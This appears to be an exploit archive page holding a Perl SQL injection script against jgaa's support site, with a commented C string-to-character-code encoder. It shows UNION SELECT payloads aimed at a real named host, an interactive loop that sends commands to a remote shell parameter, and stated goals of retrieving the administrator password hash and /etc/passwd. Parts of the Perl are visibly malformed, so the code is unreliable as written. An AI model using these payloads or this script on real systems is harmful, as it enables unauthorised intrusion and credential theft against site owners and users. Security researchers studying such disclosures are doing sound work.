jgaa remote SQL injection exploit that allows administrator password hash retrieval.
1f985808327542ceaf40c4201340e279d95406ff802e793817633815898a85db#!/usr/bin/perl
#You can get admin hash,or acces the pass file from the *NIx
#with the generated strings with the generator.c program
#you have to put in sql specific comands,my example is for
#tables and *NIX pass
#exploit tested on winxp sp2
# #include<stdio.h>
# #include<stdlib.h>
# #include<string.h>
# int main()
# { char st[1024];
# int le;
# printf("Input : ");
# gets(st);
# for(le=0;le<strlen(st);le++)
# { printf("%d,",st[le]);
# }
# system("pause");
# return 0;
# }
#101,116,99,47,112,97,115,115,119,100 = /etc/passwd
#If we would do this :
#http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*
#we create 8 tables ,to see the result type :
#-1/**/UNION/**/SELECT/**/0,1,2,3,4,5,6,7,8/*
print "......Start.......\n";
print ".................\n";
print ". fl0 fl0w .\n";
print ". found by fl0w fl0w\n";
print ". c0ded by fl0 fl0w\n";
print ".......Email me at flo[underscore]fl0w[underscore]supremacy[dot]com\n\n";
print ".................\n\n";
use LWP::UserAgent;
$site=@ARGV[0];
$shells=@ARGV[1];
$shellcmd=@ARGV[2];
if($site!~/http:\/\// || $site!~/http:\/\// || !$shells)
{ routine()
}
header();
while() { print"[shell] \$";
while(<STDIN>)
{ $cmd=$_;
chomp($cmd);
$sploit=LWP::UserAgent->new() or die;
$requesting=HTTP::Request->new(GET=>$site.'/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*'.$shells.'?&'.$shellcmd.'='.$cmd) or die"\n\n NOT CONNECTED\n";
$re=$sploit->request(requesting);
$i=$re->content;
$i=~tr/[\n]/[ê]/;
if(!$cmd) { print "Enter a command\n\n";
$i="";
}
elsif(i=~/failed to open:HTTP request failed!/ || $i=~/:cannot execute the command in <b>/ )
{ print "\nCould NOT connect to cmd from host \n";
exit;
}
elsif($i=~/^<br.\/>.<b>WARNING/) {
print "\nInvalid command\n\n";
};
if($i=~/(.+)<br.\/>.<b>WARNING.(.+)<br.\/>.<b>WARNING/)
{ $last=$1;
$last=~tr/[&234;]/[\n]/;
print "\n$last\n";
last;
}
else {
print "[shell] \$";
}
}
}
last;
sub header()
{ print q {
================================================================================================================================================================
MSQL injection -file disclosure in Jgaa's Internet
PoC:http://support.jgaa.com
Demo:http://support.jgaa.com/index.php?cmd=DownloadVersion&ID=-1/**/UNION/**/SELECT/**/0/*
================================================================================================================================================================
}
}
sub routine()
{ header();
print q {
======================================================================================================
USAGE: perl exploit.pl <http://site.com>
EXAMPLE: perl [localhost\][path] exploit.pl [target]
======================================================================================================
};
exit();
}
---------------------------------
Yahoo! oneSearch: Finally, mobile search that gives answers, not web links. 
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed